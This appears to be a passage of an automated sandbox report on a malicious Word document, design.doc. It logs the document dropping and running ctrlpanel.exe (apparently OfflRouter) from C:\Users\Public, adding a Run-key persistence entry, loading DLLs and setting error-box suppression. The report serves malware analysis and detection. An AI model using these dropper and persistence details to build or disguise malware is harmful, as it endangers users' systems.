          Source: ~WRD3881.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3881.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRF{2BC6352A-126C-45AF-B021-3D7031DA06DE}.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRF{2BC6352A-126C-45AF-B021-3D7031DA06DE}.tmp.6.drOLE document summary: author field not present or empty
          Source: ~WRF{2BC6352A-126C-45AF-B021-3D7031DA06DE}.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0199.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0199.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0820.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1058.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1058.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1250.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1250.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1453.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1453.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1446.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1446.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1652.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1652.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1575.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1575.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1820.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1820.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1973.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1973.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1992.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1992.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2106.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2106.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2175.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2175.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2539.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2539.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2371.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2371.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2657.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2657.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2566.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2566.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2926.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2926.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2746.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2746.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3047.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3047.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3274.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3274.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD2945.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD2945.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3403.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3403.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3148.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3148.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0447.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0447.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3320.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3320.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0568.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0568.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3480.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3480.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0721.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0721.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3672.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3672.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0846.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0846.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3840.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3840.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0000.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0000.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0002.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0002.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD0971.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD0971.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD3976.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD3976.tmp.6.drOLE document summary: edited time not present or 0
          Source: ~WRD1178.tmp.6.drOLE document summary: title field not present or empty
          Source: ~WRD1178.tmp.6.drOLE document summary: edited time not present or 0
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: design.docReversingLabs: Detection: 73%
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\Public\ctrlpanel.exe c:\Users\Public\ctrlpanel.exe
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\Public\ctrlpanel.exe c:\Users\Public\ctrlpanel.exeJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
          Source: design.LNK.0.drLNK file: ..\..\..\..\..\Desktop\design.doc
          Source: Templates.LNK.0.drLNK file: ..\..\Templates
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\ctrlpanel.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
          Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
          Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
          Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
          Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/document.xml
          Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
          Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
          Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
          Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
          Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
          Source: Binary string: E:\Projects\OfflRouter2\OfflRouter2\obj\Release\ctrlpanel.pdb source: ctrlpanel.exe, 00000005.00000000.1690796909.0000000000492000.00000002.00000001.01000000.00000006.sdmp, ctrlpanel.exe.0.dr
          Source: design.docInitial sample: OLE summary lastprinted = 2023-11-18 08:37:00
          Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\Public\ctrlpanel.exeJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\Public\ctrlpanel.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\Public\ctrlpanel.exeJump to dropped file
          Source: C:\Users\Public\ctrlpanel.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CtrlpanelJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CtrlpanelJump to behavior
          Source: C:\Users\Public\ctrlpanel.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
